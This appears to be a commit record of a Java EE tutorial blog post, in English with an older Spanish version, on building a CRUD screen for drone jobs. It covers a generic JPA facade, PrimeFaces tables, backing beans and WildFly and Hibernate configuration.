The next thing is to create the business class. In principle we create one for each persistent entity. We already had the business bean for the Drone entity; now we create one for the Trabajo entity. Since for the Trabajo entity we need to implement the persistence operations typical of a CRUD (create, update, delete and read), we are going to refactor the code of the business beans by creating an abstract superclass that contains these basic operations, so that each concrete class will only contain its own particular business operations.\n\nWe therefore create a new Java class named AbstractFacade.java in the _negocio_ folder. This class does not need EJB bean features, so we will not add any annotation. And we refactor.\n\nThe TrabajoFacade class initially:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade {\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n }\n\n}\n----\n\nThe refactored TrabajoFacade class:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\nimport javax.persistence.EntityManager;\nimport javax.persistence.PersistenceContext;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade extends AbstractFacade<Trabajo>{\n\n\t@PersistenceContext(unitName = \"datosdrones\")\n private EntityManager em;\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n \tsuper(Trabajo.class);\n }\n \n protected EntityManager getEntityManager(){\n \treturn em;\n }\n\n}\n----\n\nNote how the abstract class is also generic, since it uses the typed query method and needs to refer to the type of the entity managed in the subclass.\n\n
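As a guide, a sketch of this superclass consistent with the operations used later (findAll() and a read by ID) could be the following; take the exact method set as an assumption based on the usual Java EE facade pattern, and check release 1.1.x for the final version:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport java.util.List;\n\nimport javax.persistence.EntityManager;\nimport javax.persistence.criteria.CriteriaQuery;\n\npublic abstract class AbstractFacade<T> {\n\n\tprivate final Class<T> entityClass;\n\n\tprotected AbstractFacade(Class<T> entityClass) {\n\t\tthis.entityClass = entityClass;\n\t}\n\n\t\/\/ Each concrete facade provides its own persistence context\n\tprotected abstract EntityManager getEntityManager();\n\n\tpublic void create(T entity) {\n\t\tgetEntityManager().persist(entity);\n\t}\n\n\tpublic T edit(T entity) {\n\t\treturn getEntityManager().merge(entity);\n\t}\n\n\tpublic void remove(T entity) {\n\t\tgetEntityManager().remove(getEntityManager().merge(entity));\n\t}\n\n\tpublic T find(Object id) {\n\t\treturn getEntityManager().find(entityClass, id);\n\t}\n\n\tpublic List<T> findAll() {\n\t\t\/\/ Typed criteria query over the entity class given by the subclass\n\t\tCriteriaQuery<T> cq = getEntityManager()\n\t\t\t\t.getCriteriaBuilder().createQuery(entityClass);\n\t\tcq.select(cq.from(entityClass));\n\t\treturn getEntityManager().createQuery(cq).getResultList();\n\t}\n}\n----\n\n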
First we lay out the business\/DAO methods we need; in this case we do not need to create any, since in the superclass we already have one method that reads all the jobs and another that reads a job by its ID. Next we will create the components in the xhtml page and, in parallel, the Java elements we need in the backing bean class. We will continue in an iterative process until we get a bug-free job listing page. Then it will be time to move on to the job detail page, which will serve for viewing and editing and for which we will follow the same implementation process.\n\nWe start with the trabajos.xhtml page, which we will implement and test step by step. Implement methodically, without mixing functionalities. The first step will be simply to show the list of jobs on the screen. Here I copy the state of the page and of the backing bean with this first step implemented.\n\nThe page:\n\n[source,xhtml,indent=0]\n----\n<ui:composition xmlns:ui=\"http:\/\/xmlns.jcp.org\/jsf\/facelets\"\n xmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\"\n template=\"\/WEB-INF\/plantillas\/plantilla.xhtml\"\n xmlns:p=\"http:\/\/primefaces.org\/ui\"\n xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n xmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">\n\t\n\t<f:metadata>\n\t\t<f:viewAction action=\"#{trabajosBean.actualizaModeloTrabajos()}\"><\/f:viewAction>\n\t<\/f:metadata>\n <ui:define name=\"central\">\n\t\t<!-- job selection listing -->\n\t\t<h:form>\n\n\t\t<p:dataTable var=\"trabajo\" value=\"#{trabajosBean.trabajos}\">\n\t\t <p:column headerText=\"N. Registro\">\n\t\t <h:outputText value=\"#{trabajo.numeroDeRegistro}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Inicio\" priority=\"3\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraInicio}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Finalizaci\u00f3n\" priority=\"2\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraFinalizacion}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Drone\" priority=\"4\">\n\t\t <h:outputText value=\"#{trabajo.droneAsignado.numeroDeSerie}\" \/>\n\t\t <\/p:column>\n\t\t<\/p:dataTable>\n\t\t<\/h:form>\n\t<\/ui:define>\n\t\n\t<!-- content of the logo zone -->\n <ui:define name=\"logo\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelLogo.xhtml\" \/>\n <\/ui:define>\n\n\t<!-- content of the menu bar zone -->\n <ui:define name=\"menu\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelMenu.xhtml\" \/>\n <\/ui:define>\n \n\t<!-- TODO: content of other zones... -->\n\n<\/ui:composition>\n----\n\nAnd the class:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.vista;\n\nimport java.util.List;\n\nimport javax.enterprise.context.RequestScoped;\nimport javax.inject.Inject;\nimport javax.inject.Named;\n\nimport com.lametaweb.jdrone.negocio.TrabajoFacade;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n@Named\n@RequestScoped\npublic class TrabajosBean {\n\n\tprivate List<Trabajo> trabajos;\n\t@Inject\n\tprivate TrabajoFacade trabajoFacade;\n\n\tpublic TrabajosBean() {\n\t}\n\n\tpublic void actualizaModeloTrabajos(){\n\t\ttrabajos = trabajoFacade.findAll();\n\t}\n\n\tpublic List<Trabajo> getTrabajos() {\n\t\treturn trabajos;\n\t}\n}\n----\n\nNext we add the delete and edit buttons to the table. We perform the deletion with an ajax call, which is the default behavior in PrimeFaces, so that only the table is updated. After checking that I can delete a job correctly, I move on to implementing the confirmation dialog. For a deletion, whether physical or logical, always put a confirmation first. The cleanest way to add a confirmation dialog is with a global ConfirmDialog.\n\n
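On the bean side, the action behind the delete button can be as simple as the following sketch, where eliminaTrabajo is a hypothetical name and remove() comes from the abstract facade:\n\n[source,java,indent=0]\n----\npublic void eliminaTrabajo(Trabajo trabajo) {\n\ttrabajoFacade.remove(trabajo); \/\/ delete through the facade\n\tactualizaModeloTrabajos(); \/\/ refresh the model behind the table\n}\n----\n\nIn the page it would be referenced as action=\"#{trabajosBean.eliminaTrabajo(trabajo)}\", which is precisely the kind of parameterized call that requires the view scope discussed above.\n\n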
When we implement business operations with Hibernate it helps a lot, while debugging the code, to see the SQL statements that Hibernate generates against the database, so that we can detect problems easily. A first approximation to this is to add this configuration for Hibernate in the _persistence.xml_ file:\n\n[source,xml,indent=0]\n----\n <property name=\"hibernate.show_sql\" value=\"true\"\/>\n <property name=\"hibernate.format_sql\" value=\"true\"\/>\n----\n\nBut this will only print the SQL statements to the console, without the parameter values. To show these values we have to adjust the log4j configuration, adding the log4j.properties file to some folder of the classpath and setting the necessary properties. When we need to see the actual query launched by Hibernate against the database, we will use a JDBC proxy driver such as https:\/\/p6spy.github.io\/p6spy\/2.0\/install.html#generic[P6Spy] or https:\/\/github.com\/arthurblake\/log4jdbc[log4jdbc].\n\nWe now implement the edit button. When we press the button we will have to navigate to a new screen with a form on which the state of the selected job can be modified. We add a new screen, trabajo.xhtml. In trabajos.xhtml the call will be like this:\n\n[source,xhtml,indent=0]\n----\n <p:button outcome=\"\/trabajo.xhtml\" icon=\"ui-icon-pencil\">\n <f:param name=\"idTrabajo\" value=\"#{trabajo.idTrabajo}\"><\/f:param>\n <\/p:button>\n----\n\nand in the trabajo.xhtml screen the assignment of the parameter in the backing bean, and the subsequent update of the model, will be like this (note that the view parameter must be bound with an EL expression):\n\n[source,xhtml,indent=0]\n----\n <f:metadata>\n <f:viewParam name=\"idTrabajo\" value=\"#{trabajoBean.idTrabajo}\"><\/f:viewParam>\n <f:viewAction action=\"#{trabajoBean.actualizaModeloTrabajo()}\"><\/f:viewAction>\n <\/f:metadata>\n----\n\n
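The backing bean of the detail screen can be sketched like this; the Long type of the identifier is an assumption, and find() is the read-by-ID operation of the facade:\n\n[source,java,indent=0]\n----\n@Named\n@ViewScoped\npublic class TrabajoBean implements Serializable {\n\n\tprivate static final long serialVersionUID = 1L;\n\n\t@Inject\n\tprivate TrabajoFacade trabajoFacade;\n\n\tprivate Long idTrabajo; \/\/ populated by <f:viewParam>\n\tprivate Trabajo trabajo; \/\/ model edited by the form\n\n\t\/\/ Invoked by <f:viewAction> once the view parameter is set\n\tpublic void actualizaModeloTrabajo() {\n\t\ttrabajo = trabajoFacade.find(idTrabajo);\n\t}\n\n\t\/\/ getters and setters for idTrabajo and trabajo ...\n}\n----\n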
\n\n\n\n\nSEE TESTS WITH ARQUILLIAN\nhttps:\/\/github.com\/wildfly\/boms\/tree\/master\/jboss-javaee-7.0-with-tools\n\n\n\n\n\n\n\n\n","old_contents":"= Implementaci\u00f3n de un CRUD: La pantalla de Gesti\u00f3n de Trabajos.\nLa metaweb\n:hp-tags: JSF, JavaServer Faces, CRUD, EJB, Hibernate, backing bean, Git, GitHub\n:published_at: 2015-07-23\n\nEn este post os resumo los aspectos m\u00e1s relevantes de la implementaci\u00f3n del caso de uso de introducci\u00f3n de Trabajos de Drones creado a partir de la solicitud de dicha funcionalidad por parte de nuestro cliente imaginario, TAS. La release de la que se parte es la 1.0.1, y a la que llegaremos ser\u00e1 la 1.1.x. As\u00ed que usad la primera para intentar implementar la pantalla por vuestra cuenta y la segunda para ver la implementaci\u00f3n terminada.\n\nYo aqu\u00ed os har\u00e9 una serie de comentarios sobre la release 1.1.x, se\u00f1alando los detalles de implementaci\u00f3n interesantes. Pero primero una breve introducci\u00f3n sobre qu\u00e9 es un mantenimiento de una entidad del modelo de dominio. En ingl\u00e9s se conoce como CRUD: Create, Read\/Retrieve, Update, Delete, y se refiere al conjunto de elementos de dise\u00f1o y programa necesarios para implementar el t\u00edpico mantenimiento de una entidad. El caso m\u00e1s sencillo se da cuando la entidad es una entidad \"hoja\" en nuestro diagrama de clases. Si la entidad tiene una o m\u00e1s relaciones con otras entidades tendremos, en ocasiones, que mantenerlas tambi\u00e9n en el CRUD. Recordemos nuestro sencillo diagrama de clases:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/003\/post003-fig045.png[]\n\n\u00bfQu\u00e9 mantenimientos podr\u00edamos hacer aqu\u00ed? Bueno, en este caso tienen sentido dos mantenimientos. El que vamos a implementar, de la entidad Trabajo, donde tendremos que mantener la relaci\u00f3n desde Trabajo hacia Drone, que representa la selecci\u00f3n del drone que va a llevar a cabo el trabajo, y la relaci\u00f3n del trabajo con sus puntos de ruta, que representa la ruta que seguir\u00e1 el drone en ese trabajo. Y por otro lado tambi\u00e9n cabe realizar un CRUD de la entidad Drone donde no cabe el mantenimiento de la relaci\u00f3n desde Drone a Trabajo ya que cuando por ejemplo creamos un drone no tiene sentido en nuestro caso asignarle en el mismo caso o en otro diferente uno o m\u00e1s trabajos.\n\nCentr\u00e1ndonos en el mantenimiento de la entidad Trabajo empecemos con su resoluci\u00f3n. Por partes, hacemos primero un an\u00e1lisis, luego el dise\u00f1o de la interfaz y por \u00faltimo vemos la implementaci\u00f3n de cada capa.\n\nLa lista de requisitos extra\u00edda de la entrevista con el cliente es la siguiente:\n\n.Lista de requisitos del mantenimiento de trabajos\n[width=\"90%\"]\n|===\n|[small]*Pantalla de listado de trabajos*\n|[small]#Inicialmente se presentar\u00e1 un listado de trabajos en pantalla.#\n|[small]#El listado se debe ordenar por todos sus campos y se presentar\u00e1 paginado.#\n|[small]#Sobre el listado dispondremos de comandos para Editar, dar de baja y dar de baja definitiva un trabajo.#\n|[small]#La baja definitiva debe ser confirmada.#\n|[small]*Pantalla de mantenimiento de trabajo*\n|[small]#Todos los campos se validar\u00e1n presentando mensajes adecuados.#\n|[small]#Se presentar\u00e1 un listado de los drones disponibles seg\u00fan la fecha del trabajo.#\n|[small]#La ruta se importar\u00e1 desde un excel generado por la aplicaci\u00f3n de gesti\u00f3n de mapas usada para la definici\u00f3n de rutas sobre mapa.#\n|===\n\nPosteriormente a la definici\u00f3n de los requisitos decidimos si usar o no una librer\u00eda JSF espec\u00edfica que nos aporte capacidades adicionales en la capa de presentaci\u00f3n. Nuestras pantallas usar\u00e1n listados con capacidades de ordenaci\u00f3n, paginaci\u00f3n, etc. Adem\u00e1s necesitamos acciones con confirmaci\u00f3n. El coste de incluir la librer\u00eda es muy bajo y finalmente optamos por incluir una en nuestro proyecto. Entre RichFaces y Primefaces elegimos la segunda por sus caracter\u00edsticas en cuanto a n\u00famero de componentes, curva de aprendizaje, documentaci\u00f3n, comunidad y tendencia exponencial de incremento en el uso en nuevos proyectos.\n\nNOTE: Si quer\u00e9is comparar la popularidad de distintas tecnolog\u00edas usad Google Trends. Tendr\u00e9is que a\u00f1adir los t\u00e9rminos que identifiquen a cada tecnolog\u00eda. Y hay que cuidar que el t\u00e9rmino no recoja resultados no deseados. Por ejemplo si quer\u00e9is ver la tendencia del framework ionic para aplicaciones h\u00edbridas escribir \"ionic framework\" y no \"ionic\" a secas. La URL es https:\/\/www.google.es\/trends[\u00e9sta]. \n\nA\u00f1adimos PrimeFaces al proyecto. Adem\u00e1s, optamos por trabajar con la \u00faltima versi\u00f3n de JSF. La versi\u00f3n que trae EAP 6.3 es la 2.1. Se ha intentado seguir el procedimiento existente en la web para incluir la \u00faltima versi\u00f3n en este servidor pero no ha sido posible. En resumen el proceso pasa por bajar una aplicaci\u00f3n Maven desde Github que genera un fichero CLI que realiza el deploy de los tres slots para los tres m\u00f3dulos que se ven afectados por la actualizaci\u00f3n. 
Sin embargo uno de los slots da problemas ya que parece que el script est\u00e1 actualizado para operar con las versiones iniciales del servidor Wildfly y no del EAP.\n\nDe modo que optamos por adoptar el nuevo servidor Wildfly en su \u00faltima versi\u00f3n, la 9.0.1, y as\u00ed tener disponible una plataforma Java EE 7 completa. Lo primero ser\u00e1 descargar el fichero de instalaci\u00f3n del servidor http:\/\/wildfly.org\/downloads\/[aqu\u00ed]. Ten\u00e9is que elegir la primera de las opciones, la que tiene la versi\u00f3n 9.0.1.Final.\n\nNOTE: Descargaos tambi\u00e9n los Quickstarts porque os van a venir muy bien como material de consulta en las etapas iniciales de la implementaci\u00f3n de un nuevo proyecto sea cual sea la naturaleza de \u00e9ste.\n\nUna vez instalado WildFly lo a\u00f1adimos a Eclipse como nueva unidad de ejecuci\u00f3n. La versi\u00f3n de las JBoss Tools s\u00f3lo ofrec\u00eda un conector para la versi\u00f3n 8 del servidor pero despu\u00e9s de las pruebas de arranque y parada parece que para un uso sencillo no tendremos problemas con esto.\n\nNOTE: Si no lo hab\u00e9is hecho a\u00fan versionad bajo Git el proyecto y cread el correspondiente repositorio remoto en GitHub para ir publicando vuestras releases. \n\n\u00bfQu\u00e9 cambios tendremos que hacer en nuestro proyecto tras el cambio de servidor y la actualizaci\u00f3n de las versiones de las tecnolog\u00edas? En primer lugar tendremos que adaptar las dependencias Maven a las del nuevo servidor, un proceso sin demasiada complicaci\u00f3n. Para consultar los cambios en el c\u00f3digo que se produzcan durante el desarrollo de este post bajaos la release 1.1.x en https:\/\/github.com\/lametaweb\/jdrone\/archive\/1.1.0.zip[esta direcci\u00f3n].\n\nAprovechando que pom.xml ha variado he refactorizado el ciclo de construcci\u00f3n de modo que ahora existe un profile \"despliegue-recursos\" que se debe ejecutar la primera vez que despleguemos la aplicaci\u00f3n o bien si los recursos han sido eliminados por cualquier motivo. Esto lo he hecho para evitar los problemas derivados del bloqueo de la base de datos. Ten\u00e9is que crear una nueva configuraci\u00f3n de ejecuci\u00f3n: Bot\u00f3n derecho proyecto > Run As > Run Configurations... > bot\u00f3n derecho sobre Maven build > New > En la entrada Goals escribir \"clean install -Pdespliegue-recursos\" y dar un nombre al nuevo perfil.\n\nEn segundo lugar, como vamos a subir desde JSF 2.1 a 2.2 actualizamos los espacios de nombres en el nodo ra\u00edz del fichero _faces-config.xml_. Adem\u00e1s tendremos que actualizar la faceta JavaServer Faces. La desmarcamos, esperamos a que se desinstale y la volvemos a marcar. 
Al a\u00f1adirla de nuevo la opci\u00f3n _JSF Implementation Library_ dejadla as\u00ed _Type > Disable Library Configuration_.\n\nPara comprobar que JSF 2.2 funciona correctamente modificamos nuestra p\u00e1gina index.xhtml para adaptarla a HTML5 y JSF 2.2, a\u00f1adiendo adem\u00e1s una etiqueta nueva en la versi\u00f3n 2.2.\n\nPara la adaptaci\u00f3n a HTML 5:\n\n`<!DOCTYPE html>`\n\nPara la adaptaci\u00f3n a JSF 2.2 cambiamos los espacios de nombres:\n\n`<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n\txmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\"\n\txmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">`\n\nFinalmente sustituimos:\n\n`<f:event listener=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" type=\"preRenderView\" \/>`\n\npor:\n\n`<f:viewAction action=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" onPostback=\"true\"><\/f:viewAction>`\n\nAdem\u00e1s ahora no se admitir\u00e1n los t\u00edpicos caracteres de espaciado `&nbsp;` y tendremos que sustituirlos por el equivalente c\u00f3digo unicode `&#160;`.\n\nNOTE: La etiqueta viewAction es nueva en JSF 2.2. Asocia un evento a una p\u00e1gina y su uso es m\u00e1s flexible que el de la etiqueta event para acciones de precarga de datos de pantalla. En nuestra pantalla inicial el uso no sigue el patr\u00f3n habitual. Un uso m\u00e1s adecuado se ver\u00e1 en la implementaci\u00f3n de las pantallas de mantenimiento de trabajos.\n\nMuy bien, una vez que tenemos correctamente actualizado el entorno de trabajo comenzamos con la implementaci\u00f3n del caso de uso planteado. Como siempre habr\u00e1 que implementar las capas de presentaci\u00f3n y negocio. Empecemos por la primera.\n\nAntes de empezar con la primera pantalla hay que crear una plantilla que proporcione el maquetado de las pantallas de la aplicaci\u00f3n. Primefaces nos da la soluci\u00f3n con Grid CSS, una librer\u00eda de estilos con la que crearemos un layout responsive al estilo de Bootstrap. Antes de empezar con la implementaci\u00f3n dibujamos un boceto del layout para tener claros los divs que tenemos que considerar.\n\nLa plantilla debe ser privada, por tanto va situada dentro de la carpeta _WEB-INF_. Una plantilla contendr\u00e1 en la cabecera elementos comunes a todas las p\u00e1ginas como gesti\u00f3n de la cach\u00e9 de cliente, estilos CSS comunes, y en el cuerpo el maquetado de la p\u00e1gina y dentro de cada elemento div (con estilos de Grid CSS) las etiquetas <ui:insert...> de Facelets para insertar el contenido.\n\nUna vez que tenemos lista nuestra plantilla, en la carpeta _\/jdrone\/src\/main\/webapp\/WEB-INF\/plantillas\/plantilla.xhtml_, y su hoja de estilos correspondiente, podemos empezar a implementar cada pantalla de la aplicaci\u00f3n en base a la plantilla.\n\nLa estructura de una p\u00e1gina ser\u00e1:\n\n[source,xhtml,indent=0]\n----\n\t<ui:composition...>\n \t<ui:define name=\"central\">\n \t...\n <\/ui:define>\n <ui:define name=\"logo\">\n \t\t<ui:include... \/>\n <\/ui:define>\n ...\n <\/ui:composition>\n----\n\nEl contenido de la zona variable, etiquetada con el nombre _central_ en la plantilla, se define en la p\u00e1gina en general al principio, para mayor claridad, dado que aqu\u00ed el orden no afecta. 
Como la zona del logo ser\u00e1 fija para todas las pantallas la implementamos en un panel (una p\u00e1gina xhtml privada) aparte y la a\u00f1adimos con un include que toma como origen el panel.\n\nEn primer lugar vamos a adaptar nuestra pantalla de consulta de los posts anteriores, de drones disponibles en una fecha, al uso de la plantilla, y movemos el contenido desde el fichero index.xhtml, que ahora se convertir\u00e1 en la pantalla inicial, al fichero consulta-inicial.xhtml.\n\nImplementamos el panel del logo e incluimos una simple animaci\u00f3n en jQuery. Primefaces est\u00e1 basado en esta librer\u00eda Javascript que es conveniente conocer ya que su uso est\u00e1 muy extendido en la capa de presentaci\u00f3n de proyectos reales. Como nuestro proyecto incluye Primefaces y \u00e9ste incluye jQuery no tenemos que a\u00f1adir la librer\u00eda de manera expl\u00edcita. En general, para cualquier proyecto, en p\u00e1ginas que no usen ninguna etiqueta de Primefaces incluiremos de manera expl\u00edcita la librer\u00eda jQuery embebida en Primefaces con las siguientes l\u00edneas:\n\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery.js\" target=\"head\" \/>`\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery-plugins.js\" target=\"head\" \/>`\n\nLo siguiente que necesitamos es un men\u00fa de opciones. Se opta por la cl\u00e1sica barra de men\u00fa. Como suele ocurrir cuando necesitamos alg\u00fan elemento para la capa de presentaci\u00f3n Primefaces nos da tambi\u00e9n en esta ocasi\u00f3n la soluci\u00f3n con el componente MenuBar. Tened en cuenta que la versi\u00f3n 5.2, abierta a la comunidad y usada en nuestro programa, tiene casi 150 componentes, y gran cantidad de caracter\u00edsticas adicionales. Dibujamos las opciones y submen\u00fas que tengamos previstos para la aplicaci\u00f3n e implementamos el men\u00fa en un nuevo panel, de la misma manera que en el caso del logo.\n\nArrancamos el servidor y ejecutamos nuestro ciclo de construcci\u00f3n para ver c\u00f3mo queda todo en pantalla. Personalmente no me convence el aspecto por defecto del men\u00fa por lo que acudimos de nuevo a Primefaces para cambiar de Theme. De paso activamos los iconos de FontAwesome a\u00f1adiendo el correspondiente par\u00e1metro en el fichero _web.xml_ para tener una gama mayor de iconos para elegir.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig005.png[]\n\nPara cambiar el Theme tenemos que a\u00f1adir una dependencia de Maven, elegimos el Theme bluesky, m\u00e1s acorde con la marca de la compa\u00f1\u00eda:\n\n[source,xml,indent=0]\n----\n <dependency>\n <groupId>org.primefaces.themes<\/groupId>\n <artifactId>bluesky<\/artifactId>\n <version>1.0.10<\/version>\n <\/dependency>\n----\n\nY a\u00f1adir un par\u00e1metro en el descriptor de despliegue, web.xml:\n\n[source,xml,indent=0]\n----\n <context-param>\n <param-name>primefaces.THEME<\/param-name>\n <param-value>bluesky<\/param-value>\n <\/context-param>\n----\n\nGuardamos los cambios. Si abrimos el fichero pom.xml observamos que se muestra un error en la dependencia a\u00f1adida, esto es debido a que esta dependencia no est\u00e1 en el repositorio Central. Tenemos por tanto que a\u00f1adir el repositorio de Primefaces a nuestra configuraci\u00f3n. Podemos hacerlo directamente desde la sugerencia que nos muestra Eclipse al poner el puntero del rat\u00f3n sobre el error. 
Introducid los datos tal y como aparecen en la siguiente figura:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig010.png[]\n\nPulsamos OK y Finish. Para afinar el estilo de la barra de men\u00fa a\u00fan m\u00e1s podemos modificar el estilo aplicado por el frmaework a los componentes que forman el men\u00fa. En la documentaci\u00f3n de Primefaces aparecen estos estilos pero lo m\u00e1s pr\u00e1ctico es ayudarnos de las herramientas de desarrollador de Chrome o Firefox para localizar f\u00e1cilmente los estilos aplicados a cada elemento sobre la propia pantalla y editarlos para ver los cambios _on the fly_.\n\n\nA\u00f1adid al principio del fichero _plantilla.css_ lo siguiente: \n\n[source,css,indent=0]\n----\n.ui-menubar{\n\theight: 1.em;\t\n\tpadding:0em !important;\t\n}\n.ui-menuitem{\n\theight: 1.8em;\n}\n----\n\nDesplegad los cambios en WildFly y comprobad que el nuevo aspecto de la pantalla es similar a \u00e9ste:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig015.png[]\n\nNOTE: Existe una herramienta muy interesante que evita los redespliegues en el servidor de desarrollo durante la implementaci\u00f3n de una aplicaci\u00f3n. Se trata de JRebel, http:\/\/zeroturnaround.com\/software\/jrebel\/. Es una herramienta de pago pero merece la pena bajar la versi\u00f3n demo y evaluar si nos merece la pena incluirla entre nuestro set de plugins.\n\nBien, para dejar lista la aplicaci\u00f3n para el comienzo de la implementaci\u00f3n de las dos pantallas de \"Gesti\u00f3n de trabajos\" movemos el contenido de index.html a consulta-inicial.xhtml y dejamos index.xhtml con un fondo de pantalla limpio como pantalla inicial de la aplicaci\u00f3n, a\u00f1adiendo una imagen de fondo.\n\nEmpezamos a\u00f1adiendo la p\u00e1gina que nos muestre la lista de trabajos. Tenemos que a\u00f1adir a cada item un bot\u00f3n para eliminarlo, y otro para modificarlo. Adem\u00e1s cada item tendr\u00e1 un link para la consulta de los detalles del trabajo. Por \u00faltimo a nivel de p\u00e1gina tendremos un bot\u00f3n para dar de alta un nuevo trabajo y otro para volver a la pantalla inicial.\n\nCreamos la p\u00e1gina trabajos.xhtml a partir de index.html. Escribiremos el c\u00f3digo necesario dentro del define del \u00e1rea \"central\". A continuaci\u00f3n creamos el backing bean para la p\u00e1gina, TrabajosBean.java, en la misma carpeta que DisponibilidadBean.java. \n\nEl \u00e1mbito para el backing bean debe extenderse hasta el \u00e1mbito de la vista, ViewScoped. Esto es necesario porque en esta p\u00e1gina vamos a implementar acciones que llaman a m\u00e9todos con par\u00e1metros y para que esta construcci\u00f3n en EL (Expression Language) sea posible el bean debe permanecer en memoria m\u00e1s all\u00e1 del \u00e1mbito de la petici\u00f3n.\n\nNOTE: Tened cuidado de elegir la clase ViewScoped correcta tras pulsar Ctrl + O. Tenemos que elegir javax.faces.view.ViewScoped y no javax.faces.bean.ViewScoped. La segunda clase es nueva en JSF 2.2 y totalmente compatible con CDI.\n\nLo siguiente es crear la clase de negocio. De momento iremos creando una para cada entidad persistente. Ya ten\u00edamos el bean de negocio de la entidad Drone, ahora creamos uno para la entidad Trabajo. 
Como para la entidad Trabajo necesitamos implementar las operaciones de persistencia t\u00edpicas de un CRUD: Crear, Modificar, Eliminar y Consultar, vamos a refactorizar el c\u00f3digo de los beans de negocio creando una superclase abstracta que contenga estas operaciones b\u00e1sicas, de manera que en la clase concreta s\u00f3lo ir\u00e1n las operaciones de negocio particulares de cada una.\n\nCreamos por tanto una nueva clase java con el nombre AbstractFacade.java en la carpeta _negocio_. Esta clase no necesita caracter\u00edsticas de bean EJB por lo que no a\u00f1adiremos ninguna anotaci\u00f3n. Y refactorizamos.\n\nLa clase TrabajoFacade inicialmente:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade {\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n \/\/ TODO Auto-generated constructor stub\n }\n\n}\n----\n\nLa clase TrabajoFacade refactorizada:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\nimport javax.persistence.EntityManager;\nimport javax.persistence.PersistenceContext;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade extends AbstractFacade<Trabajo>{\n\t\n\t@PersistenceContext(unitName = \"datosdrones\")\n private EntityManager em;\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n \/\/ TODO Auto-generated constructor stub\n \tsuper(Trabajo.class);\n }\n \n protected EntityManager getEntityManager(){\n \treturn em;\n }\n\n}\n----\n\nObservad como la clase abstracta adem\u00e1s es gen\u00e9rica dado que utiliza el m\u00e9todo de consulta tipado y necesita referirse al tipo de la entidad que se gestiona en la subclase.\n\nEn primer lugar planteamos los m\u00e9todos de negocio\/dao que necesitamos, en este caso no necesito crear ninguno ya que en la superclase ya dispongo de un m\u00e9todo que lee todos los trabajos y otro que lee un trabajo por su ID. A continuaci\u00f3n iremos creando los componentes en la p\u00e1gina xhtml y en paralelo los elementos java que vayamos necesitando en la clase backing bean. Continuaremos dentro de un proceso iterativo hasta conseguir una p\u00e1gina de listado de trabajos libre de bugs. Es el momento de pasar a la p\u00e1gina de detalle de trabajo que nos va a servir para consulta y modificaci\u00f3n y para la que seguiremos el mismo proceso de implementaci\u00f3n.\n\nEmpezamos con la p\u00e1gina trabajos.xhtml, que iremos implementando y probando paso a paso. Implementad de forma met\u00f3dica y no mezclando funcionalidades. El primer paso ser\u00e1 simplemente mostrar la lista de trabajos en la pantalla. 
